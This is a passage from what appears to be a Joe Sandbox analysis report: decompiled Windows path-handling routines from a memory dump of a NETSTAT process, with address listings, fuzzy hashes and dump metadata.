                                      													}
                                      													_t397 =  *(_t528 - 0x88) + 1;
                                      													 *(_t528 - 0x88) = _t397;
                                      													_t469 = _t469 + 0x10;
                                      													__eflags = _t397 -  *(_t528 + 0x1c);
                                      													_t392 =  *(_t528 - 0xa2);
                                      													if(_t397 <  *(_t528 + 0x1c)) {
                                      														continue;
                                      													}
                                      													goto L45;
                                      												}
                                      												_t475 = 0x216;
                                      												 *(_t528 - 0x74) = 0x216;
                                      												goto L45;
                                      											}
                                      										} else {
                                      											asm("lock dec dword [eax+ecx*8+0x4]");
                                      											goto L16;
                                      										}
                                      									}
                                      									_t491 = E02F34CAB(_t306, _t528 - 0xa4);
                                      									 *(_t528 - 0x74) = _t491;
                                      									__eflags = _t491;
                                      									if(_t491 != 0) {
                                      										goto L91;
                                      									} else {
                                      										_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                      										goto L20;
                                      									}
                                      								}
                                      								L16:
                                      								 *(_t528 - 0x74) = 0x1069;
                                      								L93:
                                      								_t298 =  *(_t528 - 0xd0) + 1;
                                      								 *(_t528 - 0xd0) = _t298;
                                      								_t474 = _t474 + _t511;
                                      								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                      								_t494 = 4;
                                      								__eflags = _t298 - _t494;
                                      								if(_t298 >= _t494) {
                                      									goto L100;
                                      								}
                                      								_t494 =  *(_t528 - 0xcc);
                                      								_t435 = _t298;
                                      								continue;
                                      							}
                                      							__eflags = _t494[2] | _t494[3];
                                      							if((_t494[2] | _t494[3]) == 0) {
                                      								goto L15;
                                      							}
                                      							goto L12;
                                      						}
                                      						__eflags = _t301;
                                      						if(_t301 != 0) {
                                      							goto L92;
                                      						}
                                      						goto L10;
                                      						L92:
                                      						goto L93;
                                      					}
                                      				} else {
                                      					_push(0x57);
                                      					L101:
                                      					return E02EBD130(_t427, _t494, _t511);
                                      				}
                                      			}
                                      0x00000000
                                      0x00000000
                                      0x02f35d6f
                                      0x02f35d6f
                                      0x02f35d73
                                      0x02f35d79
                                      0x02f35d7f
                                      0x02f35d86
                                      0x02f35d95
                                      0x02f35d98
                                      0x02f35dba
                                      0x02f35dcb
                                      0x02f35dce
                                      0x02f35dd3
                                      0x02f35dd6
                                      0x02f35dd8
                                      0x02f35de6
                                      0x02f35dec
                                      0x02f35dee
                                      0x02f35df1
                                      0x02f35df3
                                      0x02f3635a
                                      0x02f3635a
                                      0x00000000
                                      0x02f3635a
                                      0x02f35dfe
                                      0x02f35e02
                                      0x02f35e05
                                      0x02f35e07
                                      0x02f35e10
                                      0x02f35e13
                                      0x02f35e1b
                                      0x02f35e1c
                                      0x02f35e21
                                      0x02f35e22
                                      0x02f35e23
                                      0x02f35e25
                                      0x02f35e2a
                                      0x02f35e2c
                                      0x02f35e2e
                                      0x02f35e36
                                      0x02f35e39
                                      0x02f35e42
                                      0x02f35e47
                                      0x02f35e4d
                                      0x02f35e54
                                      0x02f35e54
                                      0x02f35e54
                                      0x02f35e2e
                                      0x02f35e5c
                                      0x02f35e5f
                                      0x02f35e62
                                      0x02f35e64
                                      0x02f35e6b
                                      0x02f35e70
                                      0x02f35e7a
                                      0x02f35e7a
                                      0x02f35e7a
                                      0x02f35e6b
                                      0x02f35e7e
                                      0x02f35e7f
                                      0x02f35e7f
                                      0x02f35e81
                                      0x02f35e87
                                      0x02f35e8b
                                      0x02f35e8c
                                      0x02f35e8c
                                      0x02f35e8c
                                      0x02f35e9a
                                      0x02f35e9c
                                      0x02f35ea2
                                      0x02f35ea6
                                      0x02f35f50
                                      0x02f35f50
                                      0x02f35f57
                                      0x02f35f66
                                      0x02f35f66
                                      0x02f35f66
                                      0x02f35f68
                                      0x02f35f6a
                                      0x02f363d0
                                      0x00000000
                                      0x02f35f70
                                      0x02f35f70
                                      0x02f35f91
                                      0x02f35f9c
                                      0x02f35f9e
                                      0x02f35fa4
                                      0x02f35fa6
                                      0x02f3638c
                                      0x02f36392
                                      0x02f363a1
                                      0x02f363a7
                                      0x02f363af
                                      0x02f363af
                                      0x02f363bd
                                      0x02f363d8
                                      0x00000000
                                      0x02f363d8
                                      0x02f35fac
                                      0x02f35fb2
                                      0x02f35fb4
                                      0x02f35fbd
                                      0x02f35fc6
                                      0x02f35fce
                                      0x02f35fd4
                                      0x02f35fdc
                                      0x02f35fec
                                      0x02f35fed
                                      0x02f35fee
                                      0x02f35fef
                                      0x02f35ff9
                                      0x02f35ffa
                                      0x02f35ffb
                                      0x02f35ffc
                                      0x02f36000
                                      0x02f36004
                                      0x02f36012
                                      0x02f36012
                                      0x02f36018
                                      0x02f36019
                                      0x02f3601a
                                      0x02f3601b
                                      0x02f3601c
                                      0x02f36020
                                      0x02f36059
                                      0x02f3605c
                                      0x02f36061
                                      0x02f36061
                                      0x02f36022
                                      0x02f36022
                                      0x02f36022
                                      0x02f36025
                                      0x02f3602a
                                      0x02f3602b
                                      0x02f36031
                                      0x02f36037
                                      0x02f36038
                                      0x02f3603e
                                      0x02f36048
                                      0x02f36049
                                      0x02f3604a
                                      0x02f3604b
                                      0x02f3604c
                                      0x02f3604d
                                      0x02f36053
                                      0x02f36054
                                      0x02f36054
                                      0x02f36062
                                      0x02f36065
                                      0x02f36067
                                      0x02f3606a
                                      0x02f36070
                                      0x02f36075
                                      0x02f36076
                                      0x02f36081
                                      0x02f36087
                                      0x02f36095
                                      0x02f36099
                                      0x02f3609e
                                      0x02f360a4
                                      0x02f360ae
                                      0x02f360b0
                                      0x02f360b3
                                      0x02f360b6
                                      0x02f360b8
                                      0x02f360ba
                                      0x02f360ba
                                      0x02f360ba
                                      0x02f360ba
                                      0x02f360be
                                      0x02f360c0
                                      0x02f360c5
                                      0x02f360c5
                                      0x02f360c5
                                      0x02f360c6
                                      0x02f360cd
                                      0x02f36114
                                      0x02f360cf
                                      0x02f360cf
                                      0x02f360d4
                                      0x02f360d5
                                      0x02f360da
                                      0x02f360db
                                      0x02f360e1
                                      0x02f360e2
                                      0x02f360e8
                                      0x02f360f8
                                      0x02f360fd
                                      0x02f360fe
                                      0x02f36102
                                      0x02f36104
                                      0x02f36107
                                      0x02f36109
                                      0x02f3610b
                                      0x02f3610b
                                      0x02f3610b
                                      0x02f3610b
                                      0x02f3610f
                                      0x02f3610f
                                      0x02f36117
                                      0x02f3611a
                                      0x02f3611f
                                      0x02f36125
                                      0x02f36134
                                      0x02f36139
                                      0x02f3613f
                                      0x02f36146
                                      0x02f36148
                                      0x02f3614b
                                      0x02f3614d
                                      0x02f3614f
                                      0x02f3614f
                                      0x02f3614f
                                      0x02f3614f
                                      0x02f36153
                                      0x02f36159
                                      0x02f36159
                                      0x02f3615c
                                      0x02f36163
                                      0x02f36169
                                      0x02f3616c
                                      0x02f36172
                                      0x02f36181
                                      0x02f36186
                                      0x02f36187
                                      0x02f3618b
                                      0x02f36191
                                      0x02f36195
                                      0x02f361a3
                                      0x02f361bb
                                      0x02f361c0
                                      0x02f361c3
                                      0x02f361cc
                                      0x02f361d0
                                      0x02f361dc
                                      0x02f361de
                                      0x02f361e1
                                      0x02f361e4
                                      0x02f361e6
                                      0x02f361e8
                                      0x02f361e8
                                      0x02f361e8
                                      0x02f361e8
                                      0x02f361e6
                                      0x02f361ec
                                      0x02f361f3
                                      0x02f36203
                                      0x02f36209
                                      0x02f3620a
                                      0x02f36216
                                      0x02f3621d
                                      0x02f36227
                                      0x02f36241
                                      0x02f36246
                                      0x02f3624c
                                      0x02f36257
                                      0x02f36259
                                      0x02f3625c
                                      0x02f3625e
                                      0x02f36260
                                      0x02f36260
                                      0x02f36260
                                      0x02f36260
                                      0x02f3625e
                                      0x02f36264
                                      0x02f36267
                                      0x02f36269
                                      0x02f36315
                                      0x02f36315
                                      0x02f3631b
                                      0x02f3631e
                                      0x02f36324
                                      0x02f36327
                                      0x02f3632f
                                      0x02f36330
                                      0x02f36333
                                      0x02f3633a
                                      0x02f3633c
                                      0x02f36335
                                      0x02f36335
                                      0x02f36335
                                      0x02f3633f
                                      0x02f36342
                                      0x02f3634c
                                      0x02f36352
                                      0x02f36355
                                      0x02f36355
                                      0x02f36359
                                      0x00000000
                                      0x02f3626f
                                      0x02f36275
                                      0x02f36275
                                      0x02f36278
                                      0x02f3627e
                                      0x02f3627e
                                      0x02f36281
                                      0x02f36287
                                      0x02f3628d
                                      0x02f36298
                                      0x02f3629c
                                      0x02f362a2
                                      0x02f3629e
                                      0x02f3629e
                                      0x02f3629e
                                      0x02f362a7
                                      0x02f362a7
                                      0x02f362aa
                                      0x02f362b0
                                      0x02f362f0
                                      0x02f362f0
                                      0x02f362f2
                                      0x02f362f8
                                      0x02f362fd
                                      0x02f362b2
                                      0x02f362b2
                                      0x02f362b2
                                      0x02f362b5
                                      0x02f362dd
                                      0x02f362e2
                                      0x02f362e5
                                      0x02f362b7
                                      0x02f362b8
                                      0x02f362bb
                                      0x02f362bd
                                      0x02f362c0
                                      0x02f362c4
                                      0x02f362cd
                                      0x02f362cd
                                      0x02f362c0
                                      0x02f362bb
                                      0x02f362b5
                                      0x02f36302
                                      0x02f36303
                                      0x02f36305
                                      0x02f36305
                                      0x02f36305
                                      0x02f3630c
                                      0x02f3630c
                                      0x00000000
                                      0x02f3627e
                                      0x02f36269
                                      0x02f35eac
                                      0x02f35ebb
                                      0x02f35ebe
                                      0x02f35ecb
                                      0x02f35ecb
                                      0x02f35ece
                                      0x02f35ece
                                      0x02f35ed4
                                      0x02f35ed7
                                      0x02f35ed9
                                      0x02f35edb
                                      0x02f35edb
                                      0x02f35ee1
                                      0x02f35ee1
                                      0x02f35ee3
                                      0x02f35f20
                                      0x02f35f20
                                      0x02f35ee5
                                      0x02f35ee5
                                      0x02f35ee5
                                      0x02f35ee8
                                      0x02f35f11
                                      0x02f35f18
                                      0x02f35eea
                                      0x02f35eea
                                      0x02f35eed
                                      0x02f35ef2
                                      0x02f35ef8
                                      0x02f35efb
                                      0x02f35f0a
                                      0x02f35f0a
                                      0x02f35eed
                                      0x02f35ee8
                                      0x02f35f22
                                      0x02f35f28
                                      0x00000000
                                      0x00000000
                                      0x02f35f30
                                      0x02f35f31
                                      0x02f35f37
                                      0x02f35f3a
                                      0x02f35f3d
                                      0x02f35f44
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x02f35f46
                                      0x02f35f48
                                      0x02f35f4d
                                      0x00000000
                                      0x02f35f4d
                                      0x02f35dda
                                      0x02f35ddf
                                      0x00000000
                                      0x02f35ddf
                                      0x02f35dd8
                                      0x02f35da7
                                      0x02f35da9
                                      0x02f35dac
                                      0x02f35dae
                                      0x00000000
                                      0x02f35db4
                                      0x02f35db4
                                      0x00000000
                                      0x02f35db4
                                      0x02f35dae
                                      0x02f35d88
                                      0x02f35d8d
                                      0x02f36363
                                      0x02f36369
                                      0x02f3636a
                                      0x02f36370
                                      0x02f36372
                                      0x02f3637a
                                      0x02f3637b
                                      0x02f3637d
                                      0x00000000
                                      0x00000000
                                      0x02f3637f
                                      0x02f36385
                                      0x00000000
                                      0x02f36385
                                      0x02f35d38
                                      0x02f35d3b
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x02f35d3b
                                      0x02f35d27
                                      0x02f35d29
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x02f36360
                                      0x00000000
                                      0x02f36360
                                      0x02f35c10
                                      0x02f35c10
                                      0x02f363da
                                      0x02f363e5
                                      0x02f363e5

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7623b0a33ac21bb256bcf233ea17b5270606b005aeb9e1ee0e731cd3391034a4
                                      • Instruction ID: 768d81534694207d1564b9ec8ffc0654300ac69621d467b63c7e7e59e33eb7c3
                                      • Opcode Fuzzy Hash: 7623b0a33ac21bb256bcf233ea17b5270606b005aeb9e1ee0e731cd3391034a4
                                      • Instruction Fuzzy Hash: 0B425771E002299FDB21CF68C880BA9B7B5FF49344F1481AADA5DEB342D734A985CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E02E84120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
                                      				signed int _v8;
                                      				void* _v20;
                                      				signed int _v24;
                                      				char _v532;
                                      				char _v540;
                                      				signed short _v544;
                                      				signed int _v548;
                                      				signed short* _v552;
                                      				signed short _v556;
                                      				signed short* _v560;
                                      				signed short* _v564;
                                      				signed short* _v568;
                                      				void* _v570;
                                      				signed short* _v572;
                                      				signed short _v576;
                                      				signed int _v580;
                                      				char _v581;
                                      				void* _v584;
                                      				unsigned int _v588;
                                      				signed short* _v592;
                                      				void* _v597;
                                      				void* _v600;
                                      				void* _v604;
                                      				void* _v609;
                                      				void* _v616;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				unsigned int _t161;
                                      				signed int _t162;
                                      				unsigned int _t163;
                                      				void* _t169;
                                      				signed short _t173;
                                      				signed short _t177;
                                      				signed short _t181;
                                      				unsigned int _t182;
                                      				signed int _t185;
                                      				signed int _t213;
                                      				signed int _t225;
                                      				short _t233;
                                      				signed char _t234;
                                      				signed int _t242;
                                      				signed int _t243;
                                      				signed int _t244;
                                      				signed int _t245;
                                      				signed int _t250;
                                      				void* _t251;
                                      				signed short* _t254;
                                      				void* _t255;
                                      				signed int _t256;
                                      				void* _t257;
                                      				signed short* _t260;
                                      				signed short _t265;
                                      				signed short* _t269;
                                      				signed short _t271;
                                      				signed short** _t272;
                                      				signed short* _t275;
                                      				signed short _t282;
                                      				signed short _t283;
                                      				signed short _t290;
                                      				signed short _t299;
                                      				signed short _t307;
                                      				signed int _t308;
                                      				signed short _t311;
                                      				signed short* _t315;
                                      				signed short _t316;
                                      				void* _t317;
                                      				void* _t319;
                                      				signed short* _t321;
                                      				void* _t322;
                                      				void* _t323;
                                      				unsigned int _t324;
                                      				signed int _t325;
                                      				void* _t326;
                                      				signed int _t327;
                                      				signed int _t329;
                                      
                                      				_t329 = (_t327 & 0xfffffff8) - 0x24c;
                                      				_v8 =  *0x2f5d360 ^ _t329;
                                      				_t157 = _a8;
                                      				_t321 = _a4;
                                      				_t315 = __edx;
                                      				_v548 = __ecx;
                                      				_t305 = _a20;
                                      				_v560 = _a12;
                                      				_t260 = _a16;
                                      				_v564 = __edx;
                                      				_v580 = _a8;
                                      				_v572 = _t260;
                                      				_v544 = _a20;
                                      				if( *__edx <= 8) {
                                      					L3:
                                      					if(_t260 != 0) {
                                      						 *_t260 = 0;
                                      					}
                                      					_t254 =  &_v532;
                                      					_v588 = 0x208;
                                      					if((_v548 & 0x00000001) != 0) {
                                      						_v556 =  *_t315;
                                      						_v552 = _t315[2];
                                      						_t161 = E02E9F232( &_v556);
                                      						_t316 = _v556;
                                      						_v540 = _t161;
                                      						goto L17;
                                      					} else {
                                      						_t306 = 0x208;
                                      						_t298 = _t315;
                                      						_t316 = E02E86E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
                                      						if(_t316 == 0) {
                                      							L68:
                                      							_t322 = 0xc0000033;
                                      							goto L39;
                                      						} else {
                                      							while(_v581 == 0) {
                                      								_t233 = _v588;
                                      								if(_t316 > _t233) {
                                      									_t234 = _v548;
                                      									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
                                      										_t254 = L02E84620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
                                      										if(_t254 == 0) {
                                      											_t169 = 0xc0000017;
                                      										} else {
                                      											_t298 = _v564;
                                      											_v588 = _t316;
                                      											_t306 = _t316;
                                      											_t316 = E02E86E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
                                      											if(_t316 != 0) {
                                      												continue;
                                      											} else {
                                      												goto L68;
                                      											}
                                      										}
                                      									} else {
                                      										goto L90;
                                      									}
                                      								} else {
                                      									_v556 = _t316;
                                      									 *((short*)(_t329 + 0x32)) = _t233;
                                      									_v552 = _t254;
                                      									if(_t316 < 2) {
                                      										L11:
                                      										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
                                      											_t161 = 5;
                                      										} else {
                                      											if(_t316 < 6) {
                                      												L87:
                                      												_t161 = 3;
                                      											} else {
                                      												_t242 = _t254[2] & 0x0000ffff;
                                      												if(_t242 != 0x5c) {
                                      													if(_t242 == 0x2f) {
                                      														goto L16;
                                      													} else {
                                      														goto L87;
                                      													}
                                      													goto L101;
                                      												} else {
                                      													L16:
                                      													_t161 = 2;
                                      												}
                                      											}
                                      										}
                                      									} else {
                                      										_t243 =  *_t254 & 0x0000ffff;
                                      										if(_t243 == 0x5c || _t243 == 0x2f) {
                                      											if(_t316 < 4) {
                                      												L81:
                                      												_t161 = 4;
                                      												goto L17;
                                      											} else {
                                      												_t244 = _t254[1] & 0x0000ffff;
                                      												if(_t244 != 0x5c) {
                                      													if(_t244 == 0x2f) {
                                      														goto L60;
                                      													} else {
                                      														goto L81;
                                      													}
                                      												} else {
                                      													L60:
                                      													if(_t316 < 6) {
                                      														L83:
                                      														_t161 = 1;
                                      														goto L17;
                                      													} else {
                                      														_t245 = _t254[2] & 0x0000ffff;
                                      														if(_t245 != 0x2e) {
                                      															if(_t245 == 0x3f) {
                                      																goto L62;
                                      															} else {
                                      																goto L83;
                                      															}
                                      														} else {
                                      															L62:
                                      															if(_t316 < 8) {
                                      																L85:
                                      																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
                                      																goto L17;
                                      															} else {
                                      																_t250 = _t254[3] & 0x0000ffff;
                                      																if(_t250 != 0x5c) {
                                      																	if(_t250 == 0x2f) {
                                      																		goto L64;
                                      																	} else {
                                      																		goto L85;
                                      																	}
                                      																} else {
                                      																	L64:
                                      																	_t161 = 6;
                                      																	goto L17;
                                      																}
                                      															}
                                      														}
                                      													}
                                      												}
                                      											}
                                      											goto L101;
                                      										} else {
                                      											goto L11;
                                      										}
                                      									}
                                      									L17:
                                      									if(_t161 != 2) {
                                      										_t162 = _t161 - 1;
                                      										if(_t162 > 5) {
                                      											goto L18;
                                      										} else {
                                      											switch( *((intOrPtr*)(_t162 * 4 +  &M02E845F8))) {
                                      												case 0:
                                      													_v568 = 0x2e41078;
                                      													__eax = 2;
                                      													goto L20;
                                      												case 1:
                                      													goto L18;
                                      												case 2:
                                      													_t163 = 4;
                                      													goto L19;
                                      											}
                                      										}
                                      										goto L41;
                                      									} else {
                                      										L18:
                                      										_t163 = 0;
                                      										L19:
                                      										_v568 = 0x2e411c4;
                                      									}
                                      									L20:
                                      									_v588 = _t163;
                                      									_v564 = _t163 + _t163;
                                      									_t306 =  *_v568 & 0x0000ffff;
                                      									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
                                      									_v576 = _t265;
                                      									if(_t265 > 0xfffe) {
                                      										L90:
                                      										_t322 = 0xc0000106;
                                      									} else {
                                      										if(_t321 != 0) {
                                      											if(_t265 > (_t321[1] & 0x0000ffff)) {
                                      												if(_v580 != 0) {
                                      													goto L23;
                                      												} else {
                                      													_t322 = 0xc0000106;
                                      													goto L39;
                                      												}
                                      											} else {
                                      												_t177 = _t306;
                                      												goto L25;
                                      											}
                                      											goto L101;
                                      										} else {
                                      											if(_v580 == _t321) {
                                      												_t322 = 0xc000000d;
                                      											} else {
                                      												L23:
                                      												_t173 = L02E84620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                      												_t269 = _v592;
                                      												_t269[2] = _t173;
                                      												if(_t173 == 0) {
                                      													_t322 = 0xc0000017;
                                      												} else {
                                      													_t316 = _v556;
                                      													 *_t269 = 0;
                                      													_t321 = _t269;
                                      													_t269[1] = _v576;
                                      													_t177 =  *_v568 & 0x0000ffff;
                                      													L25:
                                      													_v580 = _t177;
                                      													if(_t177 == 0) {
                                      														L29:
                                      														_t307 =  *_t321 & 0x0000ffff;
                                      													} else {
                                      														_t290 =  *_t321 & 0x0000ffff;
                                      														_v576 = _t290;
                                      														_t310 = _t177 & 0x0000ffff;
                                      														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                      															_t307 =  *_t321 & 0xffff;
                                      														} else {
                                      															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                      															E02EAF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                      															_t329 = _t329 + 0xc;
                                      															_t311 = _v580;
                                      															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                      															 *_t321 = _t225;
                                      															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                      																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                      															}
                                      															goto L29;
                                      														}
                                      													}
                                      													_t271 = _v556 - _v588 + _v588;
                                      													_v580 = _t307;
                                      													_v576 = _t271;
                                      													if(_t271 != 0) {
                                      														_t308 = _t271 & 0x0000ffff;
                                      														_v588 = _t308;
                                      														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                      															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                      															E02EAF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                      															_t329 = _t329 + 0xc;
                                      															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                      															 *_t321 = _t213;
                                      															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                      																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                      															}
                                      														}
                                      													}
                                      													_t272 = _v560;
                                      													if(_t272 != 0) {
                                      														 *_t272 = _t321;
                                      													}
                                      													_t306 = 0;
                                      													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                      													_t275 = _v572;
                                      													if(_t275 != 0) {
                                      														_t306 =  *_t275;
                                      														if(_t306 != 0) {
                                      															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                      														}
                                      													}
                                      													_t181 = _v544;
                                      													if(_t181 != 0) {
                                      														 *_t181 = 0;
                                      														 *((intOrPtr*)(_t181 + 4)) = 0;
                                      														 *((intOrPtr*)(_t181 + 8)) = 0;
                                      														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                      														if(_v540 == 5) {
                                      															_t182 = E02E652A5(1);
                                      															_v588 = _t182;
                                      															if(_t182 == 0) {
                                      																E02E7EB70(1, 0x2f579a0);
                                      																goto L38;
                                      															} else {
                                      																_v560 = _t182 + 0xc;
                                      																_t185 = E02E7AA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                      																if(_t185 == 0) {
                                      																	_t324 = _v588;
                                      																	goto L97;
                                      																} else {
                                      																	_t306 = _v544;
                                      																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                      																	 *(_t306 + 4) = _t282;
                                      																	_v576 = _t282;
                                      																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                      																	 *_t306 = _t325;
                                      																	if( *_t282 == 0x5c) {
                                      																		_t149 = _t325 - 2; // -2
                                      																		_t283 = _t149;
                                      																		 *_t306 = _t283;
                                      																		 *(_t306 + 4) = _v576 + 2;
                                      																		_t185 = _t283 & 0x0000ffff;
                                      																	}
                                      																	_t324 = _v588;
                                      																	 *(_t306 + 2) = _t185;
                                      																	if((_v548 & 0x00000002) == 0) {
                                      																		L97:
                                      																		asm("lock xadd [esi], eax");
                                      																		if((_t185 | 0xffffffff) == 0) {
                                      																			_push( *((intOrPtr*)(_t324 + 4)));
                                      																			E02EA95D0();
                                      																			L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                      																		}
                                      																	} else {
                                      																		 *(_t306 + 0xc) = _t324;
                                      																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                      																	}
                                      																	goto L38;
                                      																}
                                      															}
                                      															goto L41;
                                      														}
                                      													}
                                      													L38:
                                      													_t322 = 0;
                                      												}
                                      											}
                                      										}
                                      									}
                                      									L39:
                                      									if(_t254 !=  &_v532) {
                                      										L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                      									}
                                      									_t169 = _t322;
                                      								}
                                      								goto L41;
                                      							}
                                      							goto L68;
                                      						}
                                      					}
                                      					L41:
                                      					_pop(_t317);
                                      					_pop(_t323);
                                      					_pop(_t255);
                                      					return E02EAB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                      				} else {
                                      					_t299 = __edx[2];
                                      					if( *_t299 == 0x5c) {
                                      						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                      						if(_t256 != 0x5c) {
                                      							if(_t256 != 0x3f) {
                                      								goto L2;
                                      							} else {
                                      								goto L50;
                                      							}
                                      						} else {
                                      							L50:
                                      							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                      								goto L2;
                                      							} else {
                                      								_t251 = E02EA3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                      								_pop(_t319);
                                      								_pop(_t326);
                                      								_pop(_t257);
                                      								return E02EAB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                      							}
                                      						}
                                      					} else {
                                      						L2:
                                      						_t260 = _v572;
                                      						goto L3;
                                      					}
                                      				}
                                      				L101:
                                      			}















































































                                      0x02e8438e
                                      0x02e84396
                                      0x02e8439e
                                      0x02e843a1
                                      0x02e843ad
                                      0x02e843bb
                                      0x02e843bb
                                      0x02e843ad
                                      0x02e8436e
                                      0x02e843bf
                                      0x02e843c5
                                      0x02e84463
                                      0x02e84463
                                      0x02e843ce
                                      0x02e843d5
                                      0x02e843d9
                                      0x02e843df
                                      0x02e84475
                                      0x02e84479
                                      0x02e84491
                                      0x02e84491
                                      0x02e84479
                                      0x02e843e5
                                      0x02e843eb
                                      0x02e843f4
                                      0x02e843f6
                                      0x02e843f9
                                      0x02e843fc
                                      0x02e843ff
                                      0x02e844e8
                                      0x02e844ed
                                      0x02e844f3
                                      0x02ece247
                                      0x00000000
                                      0x02e844f9
                                      0x02e84504
                                      0x02e84508
                                      0x02e8450f
                                      0x02ece269
                                      0x00000000
                                      0x02e84515
                                      0x02e84519
                                      0x02e84531
                                      0x02e84534
                                      0x02e84537
                                      0x02e8453e
                                      0x02e84541
                                      0x02e8454a
                                      0x02ece255
                                      0x02ece255
                                      0x02ece25b
                                      0x02ece25e
                                      0x02ece261
                                      0x02ece261
                                      0x02e84555
                                      0x02e84559
                                      0x02e8455d
                                      0x02ece26d
                                      0x02ece270
                                      0x02ece274
                                      0x02ece27a
                                      0x02ece27d
                                      0x02ece28e
                                      0x02ece28e
                                      0x02e84563
                                      0x02e84563
                                      0x02e84569
                                      0x02e84569
                                      0x00000000
                                      0x02e8455d
                                      0x02e8450f
                                      0x00000000
                                      0x02e844f3
                                      0x02e843ff
                                      0x02e84405
                                      0x02e84405
                                      0x02e84405
                                      0x02e842ac
                                      0x02e8428c
                                      0x02e84282
                                      0x02e84407
                                      0x02e8440d
                                      0x02ece2af
                                      0x02ece2af
                                      0x02e84413
                                      0x02e84413
                                      0x00000000
                                      0x02e841d4
                                      0x00000000
                                      0x02e841c3
                                      0x02e841bd
                                      0x02e84415
                                      0x02e84415
                                      0x02e84416
                                      0x02e84417
                                      0x02e84429
                                      0x02e8416e
                                      0x02e8416e
                                      0x02e84175
                                      0x02e84498
                                      0x02e8449f
                                      0x02ece12d
                                      0x00000000
                                      0x02ece133
                                      0x00000000
                                      0x02ece133
                                      0x02e844a5
                                      0x02e844a5
                                      0x02e844aa
                                      0x00000000
                                      0x02e844bb
                                      0x02e844ca
                                      0x02e844d6
                                      0x02e844d7
                                      0x02e844d8
                                      0x02e844e3
                                      0x02e844e3
                                      0x02e844aa
                                      0x02e8417b
                                      0x02e8417b
                                      0x02e8417b
                                      0x00000000
                                      0x02e8417b
                                      0x02e84175
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2776c1bcea688b14afd19ddfd30918fe3d40759f5a2f209826bc22ef621427fc
                                      • Instruction ID: 4a2016d166f4b9f3b6a73ba97318d6ec94548338b910bd8e01b8b47e188bf4f6
                                      • Opcode Fuzzy Hash: 2776c1bcea688b14afd19ddfd30918fe3d40759f5a2f209826bc22ef621427fc
                                      • Instruction Fuzzy Hash: 5EF16F705482128BC728DF59C580A7AB7E1FF88758F14A92EF4CDCB290E734D991CB52
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 92%
                                      			E02E920A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                      				signed int _v16;
